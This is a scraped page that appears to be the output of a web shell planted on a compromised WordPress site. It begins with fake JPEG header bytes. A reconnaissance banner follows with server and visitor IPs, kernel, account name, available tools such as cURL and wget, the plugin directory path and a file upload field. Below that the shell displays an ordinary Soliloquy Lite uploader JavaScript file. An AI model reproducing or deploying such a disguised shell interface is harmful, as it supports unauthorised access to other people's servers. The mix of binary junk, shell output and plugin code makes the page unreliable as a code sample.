????JFIF??x?x????'
| Server IP : 172.67.174.47  /  Your IP : 216.73.216.83 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /././home/tempvsty/././pontiacques.org/wp-content/plugins/soliloquy-lite/assets/js/ | 
| Upload File : | 
/**
 * Hooks into the global Plupload instance ('uploader'), which is set when includes/admin/metaboxes.php calls media_form()
 * We hook into this global instance and apply our own changes during and after the upload.
 *
 * @since 1.3.1.3
 */
; (function ($, window, document, soliloquy_media_uploader) {
	console.log(soliloquy_media_uploader);
	$(function () {
		if (typeof uploader !== 'undefined') {
			//soliloquy_media_uploader.uploader_files_computer
			$('input#plupload-browse-button').val(soliloquy_media_uploader.uploader_files_computer);
			$('.drag-drop-info').text(soliloquy_media_uploader.uploader_info_text);
			// Set a custom progress bar
			$('#soliloquy .drag-drop-inside').append('<div class="soliloquy-progress-bar"><div></div></div>');
			var soliloquy_bar = $('#soliloquy .soliloquy-progress-bar'),
				soliloquy_progress = $('#soliloquy .soliloquy-progress-bar div'),
				soliloquy_output = $('#soliloquy-output');
			// Files Added for Uploading
			uploader.bind('FilesAdded', function (up, files) {
				$(soliloquy_bar).fadeIn();
			});
			// File Uploading - show progress bar
			uploader.bind('UploadProgress', function (up, file) {
				$(soliloquy_progress).css({
					'width': up.total.percent + '%'
				});
			});
			// File Uploaded - AJAX call to process image and add to screen.
			uploader.bind('FileUploaded', function (up, file, info) {
				// AJAX call to soliloquy to store the newly uploaded image in the meta against this Gallery
				$.post(
					soliloquy_media_uploader.ajax,
					{
						action: 'soliloquy_load_image',
						nonce: soliloquy_media_uploader.load_image,
						id: info.response,
						post_id: soliloquy_media_uploader.id
					},
					function (res) {
						// Prepend or append the new image to the existing grid of images,
						// depending on the media_position setting
						switch (soliloquy_media_uploader.media_position) {
							case 'before':
								$(soliloquy_output).prepend(res);
								break;
							default:
							case 'after':
								$(soliloquy_output).append(res);
								break;
						}
						$(document).trigger('soliloquyUploaded');
						$(res).find('.wp-editor-container').each(function (i, el) {
							var id = $(el).attr('id').split('-')[4];
							quicktags({ id: 'soliloquy-caption-' + id, buttons: 'strong,em,link,ul,ol,li,close' });
							QTags._buttonsInit(); // Force buttons to initialize.
						});
						//How many slides are inserted into slider
						var list = $('#soliloquy-output li').length;
						//update the count value
						$('.soliloquy-count').text(list.toString());
						//Hides empty slider screen
						if (list > 0) {
							$('#soliloquy-empty-slider').fadeOut().addClass('soliloquy-hidden');
							$('.soliloquy-slide-header').removeClass('soliloquy-hidden').fadeIn();
						}
					},
					'json'
				);
			});
			// Files Uploaded
			uploader.bind('UploadComplete', function () {
				// Hide Progress Bar
				$(soliloquy_bar).fadeOut();
			});
			// File Upload Error
			uploader.bind('Error', function (up, err) {
				// Show message
				$('#soliloquy-upload-error').html('<div class="error fade"><p>' + err.file.name + ': ' + err.message + '</p></div>');
				up.refresh();
			});
		}
	});
})(jQuery, window, document, soliloquy_media_uploader);